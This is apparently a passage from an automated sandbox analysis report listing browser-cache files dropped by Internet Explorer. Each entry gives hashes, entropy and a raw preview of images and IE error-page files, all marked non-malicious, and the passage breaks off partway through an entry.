                                                                                                                                                                                                                                  SHA-512:B47604BEEFF49C5BADC79339AB6886760B21092FF1C5198D97C972E8AE50FFE56AB42D6FF3A14300726FF97B3928CFCC19E9B09A4094D3C63C7F77C6B7DB5FE0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....l.....3@.....u-..*T.'CX5+..^Kw....a.V....k6.."..hl."8fe..@=?.^.fa.#...*.Xt....*.H.w!.C.w.kP/=.i..L..y#.....J...[.&....<..MNH.W.|..s.p.9....]6.........p+..q....nr..{]1..&..W9..........".<V..$F&..wo.G...{.l.I..............Mn..7.dFR.n9..=..Y.7...Fi......nrI.J..w+.p...9`....g....*.{..Z..y..=..p.....T..k}....;A!,..V9..".....A.....{...W.s....Q.FY..v.F1.u...4..?S.KP
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\AAOgssn[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1795
                                                                                                                                                                                                                                  Entropy (8bit):7.7052505934793505
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:QfAuETAKN9RqSHHdGyoWoShvSm7czvspOcRAilZMtJ6o+:Qf7EBN9Rq3O7cgRllZc6z
                                                                                                                                                                                                                                  MD5:955778C44C886F710B68343BFD22399D
                                                                                                                                                                                                                                  SHA1:5029F27A4CB7E72AA88443535A4EEB062444698F
                                                                                                                                                                                                                                  SHA-256:4400EE9063E5D9C7B74193207380EFF45087A5859C07B3C85D0BA0C31F16CFBA
                                                                                                                                                                                                                                  SHA-512:FBB8B427C49408CBB2B44E073656398AC5C2BF55F8DAD44000EBA12F4E2C24B6EBE1258F1D870F071A3F0BAEF3F846CC6DB40A74665D86DE0B3B2637E1BC0308
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z..V...@."..E. ..-K()....H.dl..^U..GO....+VdL....h....)1.R...% .@.0....`Uq.S.I+VdN. :..h....I.SR...% ..5....0*....E+VdL).....R.u.]:!%..p..&..Fu..gR.i.F..-.{Y...B..]q.I.L.x..QN/..7.".cH...k..3..Z..(+.B..NVzz.:.....`....8....tR.ME8.aVR.i.....i.~.R.79..*...^.".iS.,.4.~.Q.n.g...nz..z....K].....z=..k.."z`Vo.@...fD.i...%.P.....UK...kJ..+.....|~.{..m....&$g.z.Z..5..y..\......:].{.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\AAOguTA[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8913
                                                                                                                                                                                                                                  Entropy (8bit):7.92704245333277
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Qo4x+X1wBOZURMxGfEa2Nbe/e33DLBH86cg2w:bnXqB0sVEa2Y/03xH8zw
                                                                                                                                                                                                                                  MD5:6A4DF2C42DA5EA53EA4B3A6CD2EDB5D2
                                                                                                                                                                                                                                  SHA1:10B2E4A7F7730E8D6BF42F121D42432C26CFC089
                                                                                                                                                                                                                                  SHA-256:D33985B0529FA6B886C455C39EE3946F11CB18336F038C72BC710C6D36CFCF03
                                                                                                                                                                                                                                  SHA-512:062B790B4B455BE51348700A0065E5C35D13A14ECFADB4AFFBF51578FA03D77BB579D745C031FA84C0E612E30729E91FABB4D626178240A868F74F7C05782D39
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4....P..R...^H..."....../v~?!@.W.$...........h..s..........5.M....9=.....R.W)4.......:;......,.!K.......Jv..p....:...r.n.Xu.CHd"....3..v&....!_.'pN..Z...I.v..Kk...........$.qh.".W.8>.D....(......J.(.JC..k0.u>....r.9..1.Mu.Y.........;..8....?.R.R...z.r...#.,O..k6.j.c...9f$....3.....RD.0I...{Qa\k..(....6'......6...#..h...FF>o.Z..q.....jC.%rs...>q....dw.....4.cwJ...U$..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\AAzb5EX[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                  Entropy (8bit):6.966129933463651
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahmKxf8jCAw4DGQJe1kvnxIekdOgcKOtQExGTFDDv4bp:6v/7IxkjyzQEyaI1QmGTlW
                                                                                                                                                                                                                                  MD5:89E1141C659F2127DD80809F71326697
                                                                                                                                                                                                                                  SHA1:3262110C91000071FDBB0D33893EC1EC8026ADEC
                                                                                                                                                                                                                                  SHA-256:98763AAD3E2B7507E7729711ACD2DACCBD56164FE6DDB10410047B212275C279
                                                                                                                                                                                                                                  SHA-512:1D32DF0DB191F0A3FA152BC47F5F463234224F215A283A26E4EBAF95095A0977ABF5B9D9804FA4DDB276CA8DAE2865789802BB8A18B02B232A9DBB22D5F19E49
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..=..@..C.....K..`-(.`...vb......vV...`g.!D.....!.....7..../Qg.Z...Y........c....t.......c..)..............)@.:.....8..t1{P_\.1..3Ao......A].....5G_.....\5..x5R.....'...VS......|.`...~........+....H^..1E^...0.,')....qJ8!..D.!O}.i1..E(....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1cEP3G[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1088
                                                                                                                                                                                                                                  Entropy (8bit):7.81915680849984
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                                                                                                                                                                                                                  MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                                                                                                                                                                                                                  SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                                                                                                                                                                                                                  SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                                                                                                                                                                                                                  SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;*J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x*..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1fdtSt[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                                  Entropy (8bit):7.245257101036661
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                                                                                                                                                                                                                  MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                                                                                                                                                                                                                  SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                                                                                                                                                                                                                  SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                                                                                                                                                                                                                  SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+.....hIDATx...O+DQ../]....f..(,.,-.!.L..X..ee.,.. .I.D..h..P,&.|.c.L.i.E.{.k..~.}.}........t...W...*.5.2..0)X0I.c.wbU.....N..,....-F...J#lSq.;....a...*.....D .w.g..N.....F)l..........`_..s..A;?.4..+..ob......Qh.H.:A......(....;.z./..?.:...t.[.e..b.......{..t.A....M..0.>8&_"... Ev.Z`.."...=/..F.}X....#|.Ny. Z......W...{HX;..F..w..M:...?W.<4B..!.I.....l.o...s....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1kvzy[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                                                  Entropy (8bit):7.749452105424938
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7eZ3IqhrinW+y2UXaxTaJgfcoG7QKJ7OZfhL3cp1pW2krS7BiArfss7P7UIQb:jVT2aCTjG8MOZR372/7iU7UIylHdLN
                                                                                                                                                                                                                                  MD5:C6E13630360E0B6D880AFDF3CD2A2204
                                                                                                                                                                                                                                  SHA1:63DCA80F76834F5A3FBE79F661678375239F72A4
                                                                                                                                                                                                                                  SHA-256:49767874BCF0F0648266F3018B5CCE3CA539B85778E5395D1212ACB114287D65
                                                                                                                                                                                                                                  SHA-512:CB8F7629DA131226146B12119C06A846A2EC9E9D069711711AC50CD7F31E321144E39270E82EA693E2FE9BFD1634841BF450173807AB6607794E2AF0EBE832C8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR.............;0......pHYs..........+......IDATx..}H.u....m..rR>..9#--o........[E1..kWB.#.],\F.8X.....\.&.......x.....y.b..p...z}~y..9....^..|.>....{I.?.;.......:.Uw.|...e.(......r..Wc7Zq...F....N.O.}.n...^X..*$.q...&.%.....X....9d{.>...)..8..A...}.x#....K... z~$...4Y...<....)`..p....qr<arhwa.zY.Yq..$.<.....H...~...H|..G...@|./.8G.L..M...U..I...]..r(.s.."f..I...Q..b.x..MYd.D^.mg.G .H.........=Ot.v.D._..6.[o.7*L.....d./B)l....d.....u.....mqB.J.........4(R...........".dSj.....{.gB.<...gdT....u~.?`.X.&&&N...|.R..0..O.yV~./..; ..\.X[P....[...1y+++M...J../.+...}>_mooo...~ohh....`l......R..."...`......8...aeP...oL..f~n..m0..tY2.N.rrrT]].JKKk`"...Kw.i......|............['<...bHM).....%;..=..D.s.......CN.........Y.,..l.<...s$...v.=5....N..E.YYYjzzZ..A...+]ohIII...L?<<|....}&q...].vM..?. ...+....m.....}6....|i.e+..Vf.........V.@...3.d......cRv.f...E%G..Xvv......ru...~..j......\..f.....*.|m,//O..B....D...zUU....Z.kfccc*..."..V\__...+**R.B..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB7gRE[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):501
                                                                                                                                                                                                                                  Entropy (8bit):7.3374462687222906
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                                                                                                                                                                                                  MD5:1FCA95AEED29D3219D0A53A78A041312
                                                                                                                                                                                                                                  SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                                                                                                                                                                                                  SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                                                                                                                                                                                                  SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..RKN.A.}... ...e1(."le.....F\...@.."...|... ..ld.$.(.`..V.0].ghK....]SS...J.I.<@.O.{..........:WB8~....}Hr...P.....`l.N...N.....Z...'.3..;....3.B-....i...L........b..{... ..Q.... ........L...=.d....n.....&.!..O....W1..."....gm5x....[.C.9^Q.BC.....O...../.(...|.~.0hv..S..7.....YBn..B..o.T<.........|.g&....U.....gm.. .....U..,.u..)\$.lN.w]Rm.......OZ.h.......zn.~...A.uy........,..........3(..........z<....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BBVuddh[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):316
                                                                                                                                                                                                                                  Entropy (8bit):6.917866057386609
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                                                                                                                                                                                                                  MD5:636BACD8AA35BA805314755511D4CE04
                                                                                                                                                                                                                                  SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                                                                                                                                                                                                                  SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                                                                                                                                                                                                                  SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..|......|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.|.Q...Q..i~.|...._...'..Q...".....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BBlBV0U[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):542
                                                                                                                                                                                                                                  Entropy (8bit):7.476988192789716
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7/uYnJg/tVJWJ7i7lwFdKad7mGmPbyAjKMOPdgI6t7:Wu26M0l5aMcAjdOlgI6t7
                                                                                                                                                                                                                                  MD5:8B760EC6573A9B19F6DB79E85C2C02C1
                                                                                                                                                                                                                                  SHA1:F76EDAAC77576BC4B03C3F2C80A1F97FA96EA820
                                                                                                                                                                                                                                  SHA-256:9A2405F53A961F5CC9160554578BE42A2E7053864DE3EC91874E8EA89D2A796C
                                                                                                                                                                                                                                  SHA-512:AC35B329BBB706581C3BF915B3843FCF06D1A758ACC5E41A5EF1D1E60A0080E0E96959339FF40163F5CD34EF97DFB100A33F7A4F6E43149BDE254D1FDAC6F59B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx....K[Q..?.{..M.....*..Z:.h.......p(.....At.Tp...t.Rh...........(...e...3..(.IL<p.......W/...<.%.j.........j..X.0......zf..Y.....H]...{U..]/.Dt....N6..O,9@......hM/.T...nZ..0.a...^R.(.F.@S.X....SF....8...R....5....1...xw...N......48L^.X...di.9.Co..<..=?SC_.h_......0.8..C.6.,n<.p...;f.....F$.$~4M.......SR.....fv,...9.N.lQ.g.E$....Q....V..86.....(..2l..[..>...&...w...|..Ht.mJ.s.p......XV.....%..+&.z..V.?.F.Nim..5L..v..2.Z..P.Z4...-.n.8.9..U.mf&....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\cfdbd9[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):740
                                                                                                                                                                                                                                  Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                                  MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                                  SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                                  SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                                  SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\dnserror[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2997
                                                                                                                                                                                                                                  Entropy (8bit):4.4885437940628465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                                                                  MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                                                                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                                                                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                                                                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\down[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):748
                                                                                                                                                                                                                                  Entropy (8bit):7.249606135668305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                                                                  MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                                                                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                                                                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                                                                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\errorPageStrings[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4720
                                                                                                                                                                                                                                  Entropy (8bit):5.164796203267696
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                                                                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                                                                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                                                                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                                                                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\httpErrorPagesScripts[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12105
                                                                                                                                                                                                                                  Entropy (8bit):5.451485481468043
                                                                                                                                                                                                                                  Encrypted:false
